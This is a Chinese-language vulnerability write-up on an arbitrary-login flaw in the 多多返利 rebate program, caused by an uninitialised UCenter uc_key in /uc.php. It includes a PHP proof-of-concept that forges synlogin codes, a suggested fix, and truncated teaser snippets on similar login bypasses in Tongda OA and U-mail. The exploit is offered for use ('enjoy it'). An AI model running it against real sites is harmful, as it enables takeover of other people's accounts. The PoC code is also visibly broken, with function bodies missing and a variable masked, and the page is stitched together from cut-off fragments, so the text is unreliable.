簡要描述:多多返利程式,任意使用者登入,甚至可以提現!
詳細說明: /uc.php
在後台未開啟ucenter時候,存在典型的uc_key未初始化漏洞
由於uckey未初始化導致訪問者可以隨意呼叫uc介面的各種函式
其中包括自動登陸 修改密碼
漏洞證明:poc:
<?php
print_r('
---------------------------------------
uc_key uninitialized vul exploit
---------------------------------------
');if ($argc < 2)
error_reporting(0);
$username = $ar**[1];
$key = '';
$code = 'time=11111111111&username='.$username.'&action=synlogin';
$x = urlencode(authcode($code, "encode", $key));
print_r('plz copy this code~~ enjoy it~~ ^_^
/api/uc.php?code='.$x);
function authcode($string, $operation = 'decode', $key = '', $expiry = 0)
for($j = $i = 0; $i < 256; $i++)
for($a = $j = $i = 0; $i < $string_length; $i++)
if($operation == 'decode') else
} else
}?>
修復方案:
在後台未開啟ucenter整合的時候,或者未啟用的時候 刪除uc.php
啟用的時候沒有問題
作者 fadhack
通達OA任意使用者登入
漏洞簡介 在 logincheck code.php 檔案,變數 uid 為攻擊者可控,攻擊者可改變 uid 引數,從而控制該 sql 語句返回 user 表中指定 uid引數的使用者資訊,便可通過偽造引數來達到登入任意使用者的目的。該漏洞可獲取任意使用者session,包括系統管理員 影響版本 通...
U mail任意使用者新增漏洞(無需登入
由該漏洞即刻能增加郵件一名使用者,通過配合其他未知0day 即可getshell 只要登入了郵件伺服器,危害就很大了。可導致伺服器被入侵。在userapply.php中 省略若干 if password if nickname insert insert intouserlist mailbox,f...
通達OA前台任意使用者登入分析
最近爆了個通達 oa 任意使用者登入漏洞,正好分析分析,順便師傅一起學習。首先我們找到檔案根目錄的檔案logincheck code.php,這個檔案是沒有許可權驗證的。我們會發現在 180 行附近有兩行 login uid uid login user id user id session log...